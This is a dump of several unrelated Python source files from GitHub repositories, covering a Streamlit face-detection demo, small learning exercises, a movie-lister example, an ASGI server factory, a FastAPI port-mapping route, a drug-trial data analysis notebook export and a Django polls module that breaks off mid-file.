pathlib.PureWindowsPath(__file__)\n\n#------------------------------------------Ex1----------------------------------------------\n#no_camera = cwd.parent.parent / \"data\" / \"no_camera.png\"\n#swith = st.checkbox(\"Camera is active\", value = True) #st.button(\"ON/OFF\") \n#col1, col2 = st.columns(2)\n#\n#with col1:\n# if swith:\n# picture = st.camera_input(\"Take a picture\", key=\"camera1\")\n# else:\n# image = Image.open(str(no_camera))\n# st.image(image)\n#\n##------------------------------------------Ex1a---------------------------------------------\n#\n#face_cascade = cv2.CascadeClassifier(str(cwd.parent.parent / \"data\" / 'haarcascade_frontalface_default.xml'))\n#with col2:\n# if picture is not None:\n# st.info(\"Detection of face\")\n# # To read image file buffer with OpenCV:\n# bytes_data = picture.getvalue()\n# cv2_img = cv2.imdecode(np.frombuffer(bytes_data, np.uint8), cv2.IMREAD_COLOR)\n# gray = cv2.cvtColor(cv2_img, cv2.COLOR_RGB2GRAY)\n# # Detect the faces\n# faces = face_cascade.detectMultiScale(gray, 1.1, 4)\n# # Draw the rectangle around each face\n# for (x, y, w, h) in faces:\n# cv2.rectangle(cv2_img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n# # Display\n# cv2_img = cv2.cvtColor(cv2_img, cv2.COLOR_BGR2RGB)\n# st.image(cv2_img)\n#\n#------------------------------------------Ex2----------------------------------------------\nslide = st.sidebar\nimage_placeholder = st.empty()\n#\nface_cascade = cv2.CascadeClassifier(str(cwd.parent.parent / \"data\" / 'haarcascade_frontalface_default.xml'))\n#\ndef detect_face(img):\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # Detect the faces\n faces = face_cascade.detectMultiScale(gray, 1.1, 4)\n # Draw the rectangle around each face\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), (255, 0, 0), 2)\n return img\n#\ndef rotate_image(img, center = False, clockwise = False, counterclockwise = False):\n img = Image.fromarray(img)\n if clockwise:\n img = img.transpose(Image.ROTATE_90)\n if center:\n img = img.transpose(0)\n if counterclockwise:\n img = img.rotate(-90)\n img = np.array(img)\n return img\n\ndef brightness_contrast(img, contrast = 0, brightness = 1.0):\n\n img = Image.fromarray(img)\n im_out = ImageEnhance.Brightness(img).enhance(float(brightness))\n im_out = ImageEnhance.Contrast(im_out).enhance(float(contrast))\n im_out = np.array(im_out)\n return im_out\n\nwith slide:\n contrast = st.slider(\"Contrast\", min_value=0.0, max_value=2.0, value=1.0, step=0.01)\n brightness = st.number_input(\"Brightness\", min_value=0.0, max_value=2.0, value=0.5, step=0.01)\n clockwise = st.button(\"ROTATE +90\")\n counterclockwise =st.button(\"ROTATE -90\")\n center =st.button(\"CENTER\")\n\ndef transform(frame):\n frame = brightness_contrast(frame, contrast=contrast, brightness=brightness)\n frame = rotate_image(frame, center, clockwise, counterclockwise)\n return frame\n\n#\nvideo = cv2.VideoCapture(0)\nok = True\nwhile ok:\n ok, frame = video.read()\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n # To read image file buffer as a PIL Image:\n frame = transform(frame)\n frame = detect_face(frame)\n with image_placeholder:\n st.image(frame)","repo_name":"modvala/streamlit-demo-templates","sub_path":"src/st_face.py","file_name":"st_face.py","file_ext":"py","file_size_in_byte":3575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72040634808","text":"# a,b,c = 0\n# Non-iterable Object\na,b,c = 0,0,0\n\na,b,c = [0,0,0]\n# Array Destructing\na,b,c = [0,0],[1,1],[2,2]\n# a,b,c = {0,0,0},0,0\n\n# Object Literal\n\nstate = {\n 'login': None,\n 'signup': None,\n 'user': {\n 'name':'jai',\n 'age':13\n }\n}\n\n# {} [] () set() - Pass by Reference\nuserRef = state['user']\n# userRef['name'] = 'dev'\n# print(userRef)\n\n# Object Destructing\nuserVal = {**state['user']}\nuserVal['name'] = 'dev'\nprint(userVal);\n\n\nprint(state)\n# print(state['login'])\nx = dict(aa=dict(aaa=1,aaaa=2),bb=2,cc=3)\nprint(x.aa)\n# print(x['aa'])\n# print(x.aa)\n# print(x['aa']['aaa'])\n\n# a = [0,0,0]\n# print(a,b,c)","repo_name":"DevBaweja/Python-Zero-to-Mastery","sub_path":"Destructing.py","file_name":"Destructing.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26193339034","text":"\"\"\"Movie finders module.\"\"\"\n\nimport csv\nimport sqlite3\nfrom typing import Callable, List\n\nfrom .entities import Movie\n\n\nclass MovieFinder:\n\n def __init__(self, movie_factory: Callable[..., Movie]) -> None:\n self._movie_factory = movie_factory\n\n def find_all(self) -> List[Movie]:\n raise NotImplementedError()\n\n\nclass CsvMovieFinder(MovieFinder):\n\n def __init__(\n self,\n movie_factory: Callable[..., Movie],\n path: str,\n delimiter: str,\n ) -> None:\n self._csv_file_path = path\n self._delimiter = delimiter\n super().__init__(movie_factory)\n\n def find_all(self) -> List[Movie]:\n with open(self._csv_file_path) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=self._delimiter)\n return [self._movie_factory(*row) for row in csv_reader]\n\n\nclass SqliteMovieFinder(MovieFinder):\n\n def __init__(\n self,\n movie_factory: Callable[..., Movie],\n path: str,\n ) -> None:\n self._database = sqlite3.connect(path)\n super().__init__(movie_factory)\n\n def find_all(self) -> List[Movie]:\n with self._database as db:\n rows = db.execute(\"SELECT title, year, director FROM movies\")\n return [self._movie_factory(*row) for row in rows]\n","repo_name":"ets-labs/python-dependency-injector","sub_path":"examples/miniapps/movie-lister/movies/finders.py","file_name":"finders.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":3320,"dataset":"github-code","pt":"77"} +{"seq_id":"7345017497","text":"ativos = []\n\n# Entrada da quantidade de ativos\nquantidadeAtivos = int(input())\n\n# Entrada dos códigos dos ativos\nfor _ in range(quantidadeAtivos):\n codigoAtivo = input()\n ativos.append(codigoAtivo)\n\n# Ordenação em ordem alfabéticas\n\ndef ordenando(ativos):\n ativos.sort()\n return ativos\n\nresultado = ordenando(ativos)\n\nfor x in resultado:\n print(x, end=\"\\n\")","repo_name":"rabmorim/BootcampPython","sub_path":"Desafio_Codigo/organizando_ativos.py","file_name":"organizando_ativos.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6631979078","text":"__version__ = \"0.2.0\"\n\nfrom qactuar.config import Config, config_init\nfrom qactuar.models import ASGIApp\nfrom qactuar.servers.async_only import AsyncOnlyServer\nfrom qactuar.servers.base import BaseQactuarServer\nfrom qactuar.servers.prefork import PreForkServer\nfrom qactuar.servers.simple_fork import SimpleForkServer\n\n\ndef make_server(\n host: str = None,\n port: int = None,\n app: ASGIApp = None,\n conf: Config = None,\n) -> BaseQactuarServer:\n if conf is None:\n conf = config_init()\n if conf.SERVER_TYPE.lower() == \"simple_fork\":\n return SimpleForkServer(host, port, app, conf)\n elif conf.SERVER_TYPE.lower() == \"prefork\":\n return PreForkServer(host, port, app, conf)\n elif conf.SERVER_TYPE.lower() == \"async_only\":\n return AsyncOnlyServer(host, port, app, conf)\n else:\n raise ValueError(f\"server_type parameter not recognised: {conf.SERVER_TYPE}\")\n\n\ndef run(\n host: str = None,\n port: int = None,\n app: ASGIApp = None,\n conf: Config = None,\n) -> None:\n qactuar_server = make_server(host, port, app, conf)\n qactuar_server.serve_forever()\n","repo_name":"Ayehavgunne/Qactuar","sub_path":"qactuar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"70953880889","text":"import json\n\nfrom fastapi import APIRouter, Request\n\nfrom PortSe.Mapping import Mapping\n\nrouter = APIRouter()\n\n\n@router.get('/{destination_port}/{protocol}')\nasync def view_mapping(destination_port: int, protocol: str, req: Request):\n ''' View Forward Mapping. '''\n address = req.client.host\n\n mapping = Mapping(address)\n mapped = mapping.view(destination_port, protocol)\n\n if mapped is None:\n return {'success': False}\n\n return {\n 'success': True,\n 'mapping': mapped\n }\n","repo_name":"danieluhm2004/portse","sub_path":"API/v1/Mapping/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"15408031451","text":"\n# coding: utf-8\n\n# In[3]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# In[4]:\n\n\nmouse_file = \"raw_data/mouse_drug_data.csv\"\ntrial_file = \"raw_data/clinicaltrial_data.csv\"\n\n\n# In[5]:\n\n\nmouse_df = pd.read_csv(mouse_file)\ntrial_df = pd.read_csv(trial_file)\n\n\n# In[6]:\n\n\nmouse_df.head()\n\n\n# In[7]:\n\n\ntrial_df.head()\n\n\n# In[8]:\n\n\nfull_df = pd.merge(mouse_df, trial_df, on=\"Mouse ID\")\nfull_df.head()\n\n\n# In[9]:\n\n\ntumor_response_error = full_df.groupby([\"Drug\",\"Timepoint\"])[\"Tumor Volume (mm3)\"].sem()\ntre_df = tumor_response_error.to_frame()\ntre_df = tre_df.rename(columns= {\"Tumor Volume (mm3)\": \"Standard Error\"})\ntre_df = tre_df.unstack(0)\ntre_df.head()\n\n\n# In[10]:\n\n\nfull_df.groupby(\"Drug\")[\"Timepoint\"].count()\ntumor_response = full_df.groupby([\"Drug\", \"Timepoint\"])\ntumor_df = tumor_response[\"Tumor Volume (mm3)\"].mean().to_frame()\ntumor_df.head()\n\n\n# In[11]:\n\n\ntumor_plot_pre = tumor_df.unstack(0)\ntumor_plot_df = tumor_plot_pre[\"Tumor Volume (mm3)\"]\ntumor_plot_df\n\n\n# In[12]:\n\n\nfull_df.groupby(\"Drug\")[\"Timepoint\"].count()\nmeta_response = full_df.groupby([\"Drug\", \"Timepoint\"])\nmeta_df = meta_response[\"Metastatic Sites\"].mean().to_frame()\nmeta_df.head()\n\n\n# In[13]:\n\n\nx_axis = [0,5,10,15,20,25,30,35,40,45]\nx_limit = 45\nplt.figure(figsize=(10,7))\n\nerror = tre_df[\"Standard Error\"][\"Capomulin\"]\ncap = plt.errorbar(x_axis, tumor_plot_df[\"Capomulin\"], yerr=error, fmt=\"o\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Infubinol\"]\ninfu = plt.errorbar(x_axis, tumor_plot_df[\"Infubinol\"], yerr=error, fmt=\"^\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Ketapril\"]\nketa = plt.errorbar(x_axis, tumor_plot_df[\"Ketapril\"], yerr=error, fmt=\"s\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Placebo\"]\nplac = plt.errorbar(x_axis, tumor_plot_df[\"Placebo\"], yerr=error, fmt=\"D\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nplt.ylim(20, 80)\nplt.xlim(0, 45)\n\nplt.title(\"Tumor Response to Treatment\", fontsize=20)\nplt.xlabel(\"Time (Days)\", fontsize=14)\nplt.ylabel(\"Tumor Volume (mm3)\", fontsize=14)\n\nplt.grid(linestyle=\"dashed\")\nplt.legend((cap, infu, keta, plac), (\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"), fontsize=12)\nplt.show()\n\n\n# In[14]:\n\n\n#This plot is with seaborn\nx_axis = [0,5,10,15,20,25,30,35,40,45]\nx_limit = 45\nplt.figure(figsize=(10,7))\n\nerror = tre_df[\"Standard Error\"][\"Capomulin\"]\ncap = plt.errorbar(x_axis, tumor_plot_df[\"Capomulin\"], yerr=error, fmt=\"o\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Infubinol\"]\ninfu = plt.errorbar(x_axis, tumor_plot_df[\"Infubinol\"], yerr=error, fmt=\"^\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Ketapril\"]\nketa = plt.errorbar(x_axis, tumor_plot_df[\"Ketapril\"], yerr=error, fmt=\"s\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror = tre_df[\"Standard Error\"][\"Placebo\"]\nplac = plt.errorbar(x_axis, tumor_plot_df[\"Placebo\"], yerr=error, fmt=\"D\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nplt.ylim(20, 80)\nplt.xlim(0, 45)\nplt.style.use('seaborn-whitegrid')\nplt.title(\"Tumor Response to Treatment\", fontsize=20)\nplt.xlabel(\"Time (Days)\", fontsize=14)\nplt.ylabel(\"Tumor Volume (mm3)\", fontsize=14)\n\nplt.grid(linestyle=\"dashed\")\nplt.legend((cap, infu, keta, plac), (\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"), fontsize=12)\nplt.show()\n\n\n# In[15]:\n\n\nmeta_response_error = full_df.groupby([\"Drug\",\"Timepoint\"])[\"Metastatic Sites\"].sem()\nmre_df = meta_response_error.to_frame()\nmre_df = mre_df.rename(columns= {\"Metastatic Sites\": \"Standard Error\"})\nmre_df = mre_df.unstack(0)\nmre_df.head()\n\n\n# In[16]:\n\n\nmeta_plot_pre = meta_df.unstack(0)\nmeta_plot_df = meta_plot_pre[\"Metastatic Sites\"]\nmeta_plot_df.head()\n\n\n# In[17]:\n\n\nplt.figure(figsize=(10,7))\n\nerror2 = mre_df[\"Standard Error\"][\"Capomulin\"]\ncap2 = plt.errorbar(x_axis, meta_plot_df[\"Capomulin\"], yerr=error2, fmt=\"o\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror2 = mre_df[\"Standard Error\"][\"Infubinol\"]\ninfu2 = plt.errorbar(x_axis, meta_plot_df[\"Infubinol\"], yerr=error2, fmt=\"^\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror2 = mre_df[\"Standard Error\"][\"Ketapril\"]\nketa2 = plt.errorbar(x_axis, meta_plot_df[\"Ketapril\"], yerr=error2, fmt=\"s\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nerror2 = mre_df[\"Standard Error\"][\"Placebo\"]\nplac2 = plt.errorbar(x_axis, meta_plot_df[\"Placebo\"], yerr=error2, fmt=\"D\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nplt.ylim(0, 4)\nplt.xlim(0, 45)\n\nplt.title(\"Metastatic Spread During Treatment\", fontsize=20)\nplt.xlabel(\"Treatment Duration (Days)\", fontsize=14)\nplt.ylabel(\"Metastatic Sites\", fontsize=14)\n\nplt.grid(linestyle=\"dashed\")\nplt.legend((cap2, infu2, keta2, plac2), (\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"), fontsize=12)\nplt.show()\n\n\n# In[18]:\n\n\npre_mice = full_df.groupby([\"Drug\", \"Timepoint\"])[\"Mouse ID\"].nunique()\nmice = pre_mice.to_frame()\nmice = mice.rename(columns={\"Mouse ID\": \"Mouse Count\"})\nmice.head()\n\n\n# In[19]:\n\n\nmice_plot = mice.unstack(0)\nmice_df = mice_plot[\"Mouse Count\"]\nmice_df\n\n\n# In[20]:\n\n\nplt.figure(figsize=(10,7))\n\ncap3 = plt.errorbar(x_axis, (mice_df[\"Capomulin\"]/25*100), fmt=\"o\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\ninfu3 = plt.errorbar(x_axis, (mice_df[\"Infubinol\"]/25*100), fmt=\"^\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\nketa3 = plt.errorbar(x_axis, (mice_df[\"Ketapril\"]/25*100), fmt=\"s\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\nplac3 = plt.errorbar(x_axis, (mice_df[\"Placebo\"]/25*100), fmt=\"D\", ls=\"dashed\", linewidth=1, alpha=1, capsize=3)\n\nplt.ylim(40, 100)\nplt.xlim(0, 45)\n\nplt.title(\"Survival During Treatment\", fontsize=20)\nplt.xlabel(\"Time (Days)\", fontsize=14)\nplt.ylabel(\"Survival Rate (%)\", fontsize=14)\n\nplt.grid(linestyle=\"dashed\")\nplt.legend((cap3, infu3, keta3, plac3), (\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"), fontsize=12)\nplt.show()\n\n\n# In[21]:\n\n\ncapchange = ((tumor_plot_df[\"Capomulin\"][45] - tumor_plot_df[\"Capomulin\"][0])/45)*100\nceftchange = ((tumor_plot_df[\"Ceftamin\"][45] - tumor_plot_df[\"Ceftamin\"][0])/45)*100\ninfuchange = ((tumor_plot_df[\"Infubinol\"][45] - tumor_plot_df[\"Infubinol\"][0])/45)*100\nketachange = ((tumor_plot_df[\"Ketapril\"][45] - tumor_plot_df[\"Ketapril\"][0])/45)*100\nnaftchange = ((tumor_plot_df[\"Naftisol\"][45] - tumor_plot_df[\"Naftisol\"][0])/45)*100\nplacchange = ((tumor_plot_df[\"Placebo\"][45] - tumor_plot_df[\"Placebo\"][0])/45)*100\npropchange = ((tumor_plot_df[\"Propriva\"][45] - tumor_plot_df[\"Propriva\"][0])/45)*100\nramichange = ((tumor_plot_df[\"Ramicane\"][45] - tumor_plot_df[\"Ramicane\"][0])/45)*100\nstelchange = ((tumor_plot_df[\"Stelasyn\"][45] - tumor_plot_df[\"Stelasyn\"][0])/45)*100\nzonichange = ((tumor_plot_df[\"Zoniferol\"][45] - tumor_plot_df[\"Zoniferol\"][0])/45)*100\n\n\n# In[22]:\n\n\ndrug_change_df = pd.DataFrame({\"Drug\": [\"Capomulin\", \"Infubinol\", \"Ketapril\", \"Placebo\"],\n \"Percent Change\": [capchange, infuchange, ketachange, placchange]\n })\ndrug_change_df\n\n\n# In[23]:\n\n\nplt.figure(figsize=(8,5))\n\nrects1 = plt.bar(0, drug_change_df[\"Percent Change\"][0], color='g', alpha=1, align=\"edge\", ec=\"black\", width=1)\nrects2 = plt.bar(1, drug_change_df[\"Percent Change\"][1], color='r', alpha=1, align=\"edge\", ec=\"black\", width=1)\nrects3 = plt.bar(2, drug_change_df[\"Percent Change\"][2], color='r', alpha=1, align=\"edge\", ec=\"black\", width=1)\nrects4 = plt.bar(3, drug_change_df[\"Percent Change\"][3], color='r', alpha=1, align=\"edge\", ec=\"black\", width=1)\ntick_locations = [value+0.5 for value in x_axis]\nplt.grid(linestyle=\"dashed\")\nplt.xticks(tick_locations, drug_change_df[\"Drug\"])\nplt.xlim(0, 4)\nplt.ylim(-30, 70)\n\n\n# In[24]:\n\n\nplt.title(\"Tumor Change Over 45 Day Treatment\", fontsize=20)\nplt.ylabel(\"% Tumor Volume Change\")\n\n\n# In[25]:\n\n\ndef autolabel(rects):\n for rect in rects:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width()/2., -8,\n '%d' % int(height) + \"%\", \n ha='center', va='bottom', color='white', fontsize=14)\n\nautolabel(rects1)\n\n\n# In[26]:\n\n\ndef autolabel(rects):\n for rect in rects:\n height = rect.get_height()\n plt.text(rect.get_x() + rect.get_width()/2., 2,\n '%d' % int(height) + \"%\", \n ha='center', va='bottom', color='white', fontsize=14)\n\nautolabel(rects2)\nautolabel(rects3)\nautolabel(rects4)\n\n\n# In[27]:\n\n\nplt.show()\n\n","repo_name":"samhazemi/dascienceHM","sub_path":"homeworksolved/week5a/Pymaceuticals.py","file_name":"Pymaceuticals.py","file_ext":"py","file_size_in_byte":8453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17081025912","text":"from builtins import str\nfrom builtins import object\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils.translation import pgettext_lazy as pgettext\n\n# om atelier import rstgen\nfrom lino.api import dd, rt\nfrom lino import mixins\nfrom lino.utils import join_elems\n\nfrom lino.utils.xmlgen import html as xghtml\nfrom lino.utils.xmlgen.html import E\n\nfrom lino.mixins import Referrable\n\nfrom lino.modlib.users.mixins import ByUser, UserAuthored\n\nfrom .utils import ResponseStates, PollStates\nfrom .roles import PollsUser, PollsStaff\n\nNullBooleanField = models.NullBooleanField\n\n\nclass ChoiceSet(mixins.BabelNamed):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Choice Set\")\n verbose_name_plural = _(\"Choice Sets\")\n\n\nclass ChoiceSets(dd.Table):\n required_roles = dd.required(PollsStaff)\n model = 'polls.ChoiceSet'\n detail_layout = \"\"\"\n name\n ChoicesBySet\n \"\"\"\n\n\nclass Choice(mixins.BabelNamed, mixins.Sequenced):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Choice\")\n verbose_name_plural = _(\"Choices\")\n\n choiceset = models.ForeignKey('polls.ChoiceSet', related_name='choices')\n\n def get_siblings(self):\n return self.choiceset.choices.order_by('seqno')\n\n @dd.action()\n def select_by_response(self, ar):\n mi = ar.master_instance\n dd.logger.info(\"20140929 %s\", mi)\n if isinstance(mi, Response):\n AnswerChoice(response=mi, choice=self).save()\n\n\nclass Choices(dd.Table):\n model = 'polls.Choice'\n required_roles = dd.required(PollsStaff)\n\n\nclass ChoicesBySet(Choices):\n master_key = 'choiceset'\n required_roles = dd.required()\n\n\n@dd.python_2_unicode_compatible\nclass Poll(UserAuthored, mixins.CreatedModified, Referrable):\n \"\"\"A series of questions.\"\"\"\n class Meta(object):\n app_label = 'polls'\n abstract = dd.is_abstract_model(__name__, 'Poll')\n verbose_name = _(\"Poll\")\n verbose_name_plural = _(\"Polls\")\n ordering = ['ref']\n\n title = models.CharField(_(\"Heading\"), max_length=200)\n\n details = models.TextField(_(\"Details\"), blank=True)\n\n default_choiceset = models.ForeignKey(\n 'polls.ChoiceSet',\n null=True, blank=True,\n related_name='polls',\n verbose_name=_(\"Default Choiceset\"))\n\n default_multiple_choices = models.BooleanField(\n _(\"Allow multiple choices\"), default=False)\n\n questions_to_add = models.TextField(\n _(\"Questions to add\"),\n help_text=_(\"Paste text for questions to add. \"\n \"Every non-empty line will create one question.\"),\n blank=True)\n\n state = PollStates.field(default=PollStates.draft.as_callable)\n\n workflow_state_field = 'state'\n\n def __str__(self):\n return self.ref or self.title\n\n def after_ui_save(self, ar, cw):\n if self.questions_to_add:\n # print \"20150203 self.questions_to_add\", self,\n # self.questions_to_add\n q = None\n qkw = dict()\n number = 1\n for ln in self.questions_to_add.splitlines():\n ln = ln.strip()\n if ln:\n if ln.startswith('#'):\n q.details = ln[1:]\n q.save()\n continue\n elif ln.startswith('='):\n q = Question(poll=self, title=ln[1:],\n is_heading=True, **qkw)\n number = 1\n else:\n q = Question(poll=self, title=ln,\n number=str(number), **qkw)\n number += 1\n q.full_clean()\n q.save()\n qkw.update(seqno=q.seqno + 1)\n self.questions_to_add = ''\n self.save() # save again because we modified afterwards\n\n super(Poll, self).after_ui_save(ar, cw)\n\n @dd.virtualfield(dd.HtmlBox(_(\"Result\")))\n def result(self, ar):\n return E.div(*tuple(get_poll_result(self)))\n\n\ndef get_poll_result(self):\n #~ yield E.h1(self.title)\n for cs in ChoiceSet.objects.all():\n questions = self.questions.filter(choiceset=cs)\n if questions.count() > 0:\n yield E.h2(str(cs))\n for question in questions:\n yield E.p(question.text)\n\n\nclass PollDetail(dd.DetailLayout):\n main = \"general results\"\n\n general = dd.Panel(\"\"\"\n ref title workflow_buttons\n details\n default_choiceset default_multiple_choices\n polls.QuestionsByPoll\n \"\"\", label=_(\"General\"))\n\n results = dd.Panel(\"\"\"\n id user created modified state\n polls.ResponsesByPoll\n # result\n PollResult\n \"\"\", label=_(\"Results\"))\n\n\nclass Polls(dd.Table):\n required_roles = dd.required(PollsUser)\n model = 'polls.Poll'\n column_names = 'ref title user state *'\n detail_layout = PollDetail()\n insert_layout = dd.InsertLayout(\"\"\"\n ref title\n default_choiceset default_multiple_choices\n questions_to_add\n \"\"\", window_size=(60, 15))\n\n\nclass AllPolls(Polls):\n required_roles = dd.required(PollsStaff)\n column_names = 'id ref title user state *'\n\n\nclass MyPolls(ByUser, Polls):\n column_names = 'ref title state *'\n\n\n@dd.python_2_unicode_compatible\nclass Question(mixins.Sequenced):\n \"\"\"A question of a poll.\n\n .. attribute:: number\n\n \"\"\"\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Question\")\n verbose_name_plural = _(\"Questions\")\n ordering = ['seqno']\n\n allow_cascaded_delete = ['poll']\n\n poll = models.ForeignKey('polls.Poll', related_name='questions')\n number = models.CharField(_(\"No.\"), max_length=20, blank=True)\n title = models.CharField(pgettext(\"polls\", \"Title\"), max_length=200)\n details = models.TextField(_(\"Details\"), blank=True)\n\n choiceset = models.ForeignKey('polls.ChoiceSet', blank=True, null=True)\n multiple_choices = models.BooleanField(\n _(\"Allow multiple choices\"), blank=True, default=False)\n is_heading = models.BooleanField(_(\"Heading\"), default=False)\n\n NUMBERED_TITLE_FORMAT = \"%s) %s\"\n\n def __str__(self):\n #~ return self.text[:40].strip() + ' ...'\n if self.number:\n return self.NUMBERED_TITLE_FORMAT % (self.number, self.title)\n return self.title\n\n def get_siblings(self):\n #~ return self.choiceset.choices.order_by('seqno')\n return self.poll.questions.order_by('seqno')\n\n def get_choiceset(self):\n if self.is_heading:\n return None\n if self.choiceset is None:\n return self.poll.default_choiceset\n return self.choiceset\n\n def full_clean(self, *args, **kw):\n if self.multiple_choices is None:\n self.multiple_choices = self.poll.default_multiple_choices\n #~ if self.choiceset_id is None:\n #~ self.choiceset = self.poll.default_choiceset\n super(Question, self).full_clean()\n\nQuestion.set_widget_options('number', width=5)\n\n\nclass Questions(dd.Table):\n required_roles = dd.required(PollsStaff)\n model = 'polls.Question'\n column_names = \"seqno poll number title choiceset is_heading *\"\n detail_layout = \"\"\"\n poll number is_heading choiceset multiple_choices\n title\n details\n AnswersByQuestion\n \"\"\"\n order_by = ['poll', 'seqno']\n\n\nclass QuestionsByPoll(Questions):\n required_roles = dd.required(PollsUser)\n master_key = 'poll'\n column_names = 'seqno number title:50 is_heading *'\n auto_fit_column_widths = True\n stay_in_grid = True\n\n\nclass ToggleChoice(dd.Action):\n \"\"\"Toggle the given choice for the given question in this response.\n \"\"\"\n readonly = False\n show_in_bbar = False\n parameters = dict(\n question=dd.ForeignKey(\"polls.Question\"),\n choice=dd.ForeignKey(\"polls.Choice\"),\n )\n no_params_window = True\n\n def run_from_ui(self, ar, **kw):\n response = ar.selected_rows[0]\n if response is None:\n return\n pv = ar.action_param_values\n qs = AnswerChoice.objects.filter(response=response, **pv)\n if qs.count() == 1:\n qs[0].delete()\n elif qs.count() == 0:\n if not pv.question.multiple_choices:\n # delete any other choice which might exist\n qs = AnswerChoice.objects.filter(\n response=response, question=pv.question)\n qs.delete()\n obj = AnswerChoice(response=response, **pv)\n obj.full_clean()\n obj.save()\n else:\n raise Exception(\n \"Oops, %s returned %d rows.\" % (qs.query, qs.count()))\n ar.success(refresh=True)\n # dd.logger.info(\"20140930 %s\", obj)\n\n\n@dd.python_2_unicode_compatible\nclass Response(UserAuthored, mixins.Registrable):\n\n class Meta(object):\n app_label = 'polls'\n verbose_name = _(\"Response\")\n verbose_name_plural = _(\"Responses\")\n ordering = ['date']\n\n poll = dd.ForeignKey('polls.Poll', related_name='responses')\n date = models.DateField(_(\"Date\"), default=dd.today)\n state = ResponseStates.field(default=ResponseStates.draft.as_callable)\n remark = models.TextField(verbose_name=_(\"My general remark\"), blank=True)\n partner = dd.ForeignKey('contacts.Partner', blank=True, null=True)\n\n toggle_choice = ToggleChoice()\n\n @dd.chooser()\n def poll_choices(cls):\n return Poll.objects.filter(state=PollStates.published)\n\n def __str__(self):\n if self.partner is None:\n return _(\"%(user)s's response to %(poll)s\") % dict(\n user=self.user, poll=self.poll)\n return _(\"{poll} {partner} {date}\").format(\n user=self.user.initials,\n date=dd.fds(self.date),\n partner=self.partner.get_full_name(salutation=False),\n poll=self.poll)\n\n @classmethod\n def get_registrable_fields(model, site):\n for f in super(Response, model).get_registrable_fields(site):\n yield f\n yield 'user'\n yield 'poll'\n yield 'date'\n yield 'partner'\n\n\nclass ResponseDetail(dd.DetailLayout):\n main = \"answers more\"\n answers = dd.Panel(\"\"\"\n poll partner date workflow_buttons\n polls.AnswersByResponse\n \"\"\", label=_(\"General\"))\n more = dd.Panel(\"\"\"\n user state\n remark\n \"\"\", label=_(\"More\"))\n\n\nclass Responses(dd.Table):\n required_roles = dd.required(PollsUser)\n model = 'polls.Response'\n detail_layout = ResponseDetail()\n insert_layout = \"\"\"\n user date\n poll\n \"\"\"\n\n\nclass AllResponses(Responses):\n required_roles = dd.required(PollsStaff)\n\n\nclass MyResponses(ByUser, Responses):\n column_names = 'date poll state remark *'\n\n\nclass ResponsesByPoll(Responses):\n master_key = 'poll'\n column_names = 'date user state partner remark *'\n\n\nclass ResponsesByPartner(Responses):\n \"\"\"Show all responses for a given partner. Default view is\n :meth:`get_slave_summary`.\n\n \"\"\"\n master_key = 'partner'\n column_names = 'date user state remark *'\n slave_grid_format = 'summary'\n\n @classmethod\n def get_slave_summary(self, obj, ar):\n \"\"\"Displays a summary of all responses for a given partner using a\n bullet list grouped by poll.\n\n \"\"\"\n if obj is None:\n return\n\n visible_polls = Poll.objects.filter(state__in=(\n PollStates.published, PollStates.closed)).order_by('ref')\n\n qs = Response.objects.filter(partner=obj).order_by('date')\n polls_responses = {}\n for resp in qs:\n polls_responses.setdefault(resp.poll.pk, []).append(resp)\n\n items = []\n for poll in visible_polls:\n iar = self.insert_action.request_from(\n ar, obj, known_values=dict(poll=poll))\n elems = [str(poll), ' : ']\n responses = 